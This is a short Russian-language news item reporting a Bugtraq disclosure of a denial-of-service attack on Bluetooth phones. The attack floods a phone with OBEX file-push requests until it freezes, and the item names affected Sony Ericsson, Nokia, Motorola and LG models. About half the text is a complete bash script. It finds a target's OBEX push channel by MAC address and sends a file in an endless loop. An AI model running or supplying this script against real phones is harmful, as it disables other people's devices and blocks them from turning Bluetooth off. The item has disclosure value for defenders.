Мир железа Найдена возможность DoS атаки на сотовые телефоны с Bluetooth

В списке рассылки Bugtraq опубликовано сообщение, суть которого - в возможности проведения DoS-атаки против ряда сотовых телефонов при помощи множественных посылок файлов с использование ПО ussp-push.

При использовании атаки телефон жертвы начинает выдавать множество сообщений, требующих получить, либо отвергнуть передаваемые файлы. Так как скорость передачи достаточно высока, через определённое время телефон попросту зависает, не давая, в том числе, отключить Bluetooth. В качестве уязвимых сотовых телефонов называются следующие модели: Sony Ericsson K700i, Nokia N70, Motorola MOTORAZR V3, Sony Ericsson W810i, LG Chocolate KG800, хотя автор утверждает об уязвимости практически всех телефонов с поддержкой Bluetooth. Используя простейший Bluetooth-донгл удалось одновременно проводить атаку на 3 телефона. Приводится текст скрипта, задав которому в качестве параметра MAC-адрес обнаруженного телефона, можно провести атак.

Code:

#!/bin/bash

checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test "$OCHAN" != ""
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}

if test $# -ne 2
then
echo "Usage: $0 <bdaddr> <filename>"
exit 127
fi

MAC=$1
FILENAME=$2

checkOPUSH $1
OCHAN=$?

if test $OCHAN -eq 0
then
echo "Couldn't connect to $MAC via OBEX push."
exit 127
fi

while true
do
./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done

(с)лито